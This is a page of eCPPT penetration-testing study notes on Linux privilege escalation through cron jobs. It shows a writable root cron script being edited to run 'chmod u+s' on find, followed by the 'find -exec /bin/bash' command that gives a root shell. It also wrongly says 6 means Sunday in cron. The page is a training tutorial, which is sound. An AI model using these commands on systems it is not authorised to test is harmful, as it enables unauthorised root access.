eCPPTv3-PTP-Notes
HomeGitHubPortfolioTwitter/XMediumCont@ct
  • 📝eCPPT / PTP - Notes
    • eCPPTv3
      • 1️⃣1 - Resource Development & Initial Access
        • 1.1 - PowerShell for Pentesters
        • 1.2 - Client-Side Attacks
          • 1.2.1 - System/Host Based Attacks
            • 1.2.1.1 Windows Vulnerabilities
          • 1.2.2 - The Metasploit Framework (MSF)
            • 1.2.2.1 MSF Introduction
            • 1.2.2.2 Information Gathering & Enumeration
            • 1.2.2.3 Vulnerability Scanning
            • 1.2.2.4 Client-Side Attacks
            • 1.2.2.5 Post Exploitation
            • 1.2.2.6 Armitage
          • 1.2.3 Exploitation
          • 1.2.4 Social Engineering
      • 2️⃣2 - Web Application Penetration Testing
        • 2.1 - Web App Concepts
          • 2.1.1 HTTP/S Protocol
          • 2.1.2 Encoding
          • 2.1.3 Same Origin
          • 2.1.4 Cookies
          • 2.1.5 Session
          • 2.1.6 Web App Proxies
        • 2.2 - Information Gathering
          • 2.2.1 Gathering Information on Your Targets
          • 2.2.2 Infrastructure
          • 2.2.3 Fingerprinting Frameworks and Applications
          • 2.2.4 Fingerprinting Custom Applications
          • 2.2.5 Enumerating Resources
          • 2.2.6 Information Disclosure Through Misconfiguration
          • 2.2.7 Google Hacking
          • 2.2.8 Shodan HQ
        • 2.3 - Cross Site Scripting
          • 2.3.1 XSS Anatomy
          • 2.3.2 Reflected XSS
          • 2.3.3 Stored XSS
          • 2.3.4 DOM-Based XSS
          • 2.3.5 Identifying & Exploiting XSS with XSSer
        • 2.4 - SQL Injection
          • 2.4.1 Introduction to SQL Injection
          • 2.4.2 Finding SQL Injection
          • 2.4.3 Exploiting In-Band SQL Injection
          • 2.4.4 Exploiting Error-Based SQL Injection
          • 2.4.5 Exploiting Blind SQL Injection
          • 2.4.6 SQLMap
          • 2.4.7 Mitigation Strategies
          • 2.4.8 From SQLi to Server Takeover
        • 2.5 - Other Common Web Attacks
          • 2.5.1 Session Attacks
          • 2.5.2 CSRF
          • 2.5.3 File and Resource Attacks
      • 3️⃣3 - Network Security
        • 3.1 Network Based Attacks
        • 3.2 Linux Vulnerabilities
        • 3.3 - Exploitation
          • 3.3.1 Linux Exploitation
      • 4️⃣4 - Exploit Development
        • 4.1 Architecture Foundamentals
        • 4.2 Assemblers and Tools
        • 4.3 Buffer Overflow
        • 4.4 Cryptography
        • 4.5 Malware
        • 4.6 Shellcoding
      • 5️⃣5 - Post-Exploitation
        • 5.1 Linux Post-Exploitation
        • 5.2 - Linux Privilege Escalation
          • 5.2.1 Kernel Exploitation
          • 5.2.2 SUID Exploitation
          • 5.2.3 CronJobs
        • 5.3 - Post Expolitation / Pivoting
          • 5.3.1 Pivoting Guidelines
          • 5.3.2 Pivoting Example (3 Targets)
      • 6️⃣6 - ​Red Teaming
        • 6.1 - Active Directory Penetration Testing
          • 6.1.1 Introduction to Active Directory (AD)
            • 6.1.1.1 Users, Groups & Computers
            • 6.1.1.2 Organizational Units (OUs)
            • 6.1.1.3 Trees, Forest & Trust
          • 6.1.2 AD Authentication
          • 6.1.3 AD Penetration Testing Methodology
        • 6.1.4 AD Enumeration
        • 6.1.5 AD Privilege Escalation
        • 6.1.6 AD Lateral Movement
        • 6.1.7 AD Persistence
        • 6.2 - Command & Control (C2/C&C)
    • eCPPTv2
      • 1️⃣1 - ​System Security
        • 1.1 Architecture Foundamentals
        • 1.2 Assemblers and Tools
        • 1.3 Buffer Overflow
        • 1.4 Cryptography
        • 1.5 Malware
        • 1.6 Shellcoding
      • 2️⃣2 - Network Security
        • 2.1 System/Host Based Attacks
          • 2.1.1 Windows Vulnerabilities
        • 2.2 Network Based Attacks
        • 2.3 The Metasploit Framework (MSF)
          • MSF Introduction
          • Information Gathering & Enumeration
          • Vulnerability Scanning
          • Client-Side Attacks
          • Post Exploitation
          • Armitage
        • 2.4 Exploitation
        • 2.5 - Post Expolitation / Pivoting
          • 2.5.1 Pivoting Guidelines
          • 2.5.2 Pivoting Example (3 Targets)
        • 2.6 Social Engineering
      • 3️⃣3 - PowerShell for PT
        • 3.1 PowerShell
      • 4️⃣4 - Linux Exploitation
        • 4.1 Linux Vulnerabilities
        • 4.2 Linux Exploitation
        • 4.3 Linux Post-Exploitation
        • 4.4 Linux Privilege Escalation
          • 4.4.1 Kernel Exploitation
          • 4.4.2 SUID Exploitation
          • 4.4.3 CronJobs
      • 5️⃣5 - Web App Security
        • 5.1 - Web App Concepts
          • 5.1.1 HTTP/S Protocol
          • 5.1.2 Encoding
          • 5.1.3 Same Origin
          • 5.1.4 Cookies
          • 5.1.5 Session
          • 5.1.6 Web App Proxies
        • 5.2 - Information Gathering
          • 5.2.1 Gathering Information on Your Targets
          • 5.2.2 Infrastructure
          • 5.2.3 Fingerprinting Frameworks and Applications
          • 5.2.4 Fingerprinting Custom Applications
          • 5.2.5 Enumerating Resources
          • 5.2.6 Information Disclosure Through Misconfiguration
          • 5.2.7 Google Hacking
          • 5.2.8 Shodan HQ
        • 5.3 - Cross Site Scripting
          • 5.3.1 XSS Anatomy
          • 5.3.2 Reflected XSS
          • 5.3.3 Stored XSS
          • 5.3.4 DOM-Based XSS
          • 5.3.5 Identifying & Exploiting XSS with XSSer
        • 5.4 - SQL Injection
          • 5.4.1 Introduction to SQL Injection
          • 5.4.2 Finding SQL Injection
          • 5.4.3 Exploiting In-Band SQL Injection
          • 5.4.4 Exploiting Error-Based SQL Injection
          • 5.4.5 Exploiting Blind SQL Injection
          • 5.4.6 SQLMap
          • 5.4.7 Mitigation Strategies
          • 5.4.8 From SQLi to Server Takeover
        • 5.5 - Other Common Web Attacks
          • 5.5.1 Session Attacks
          • 5.5.2 CSRF
      • 6️⃣6 - ​Wi-Fi Security
        • 6.1 Traffic Analysis
      • 7️⃣7 - ​Metasploit & Ruby
        • 7.1 Metasploit
      • 📄Report
        • How to write a PT Report
  • 🛣️RoadMap & My Experience
  • 📔eCPPT Cheat Sheet
Powered by GitBook
On this page
  1. eCPPT / PTP - Notes
  2. eCPPTv3
  3. 5 - Post-Exploitation
  4. 5.2 - Linux Privilege Escalation

5.2.3 CronJobs

Previous5.2.2 SUID ExploitationNext5.3 - Post Expolitation / Pivoting

CronJobs

What is a CronJob?

CronJobs is a scheduled task or command that is automatically executed at specified intervals on a Unix-like operating system. The name "cron" comes from the Greek word "chronos," meaning time, and it is a time-based job scheduler in Unix-like operating systems.

Cron jobs are commonly used for automating repetitive tasks, system maintenance, or any task that needs to be performed at specific intervals. These tasks can include things like running scripts, backing up data, updating databases, or any other routine maintenance.

The schedule for a cron job is defined using a cron expression, which consists of five fields representing the minute, hour, day of the month, month, and day of the week. For example, a cron expression like "0 2 * * *" would indicate a job that runs at 2:00 AM every day.

Here is a breakdown of the cron expression fields:

1st *: Minute (0 - 59)

2nd *: Hour (0 - 23)

3rd *: Day of the month (1 - 31)

4th *: Month (1 - 12)

5th *: Day of the week (0 - 6, where both 0 and 6 represent Sunday).

After this there's a username (root) and path of command to execute (program path) and eventually an argument (arg1).

Example of CronJob definition

This is an example of CronJob in python language that execute a bash command on the system:

#!/usr/bin/env python
import os
import sys
try:
   os.system('rm -r /home/new_user/disk_clean* ')
except:
    sys.exit()

E.g. considering that CronJob has maximum permissions (777):

*/1 *   * * *   root    /home/new_user/disk_cleaner.py

we can modify python script cronjob and execute command to escalate privilege for a normal user:

os.system('rm -r /home/new_user/disk_clean* ') -> 'chmod u+s /usr/bin/find '

waiting 1 minute new_user obtain SUID permissions for find command (ls -l /usr/bin/find) and executing find command we'll gain root privilege:

find /home -exec "/bin/bash" \;
📝
5️⃣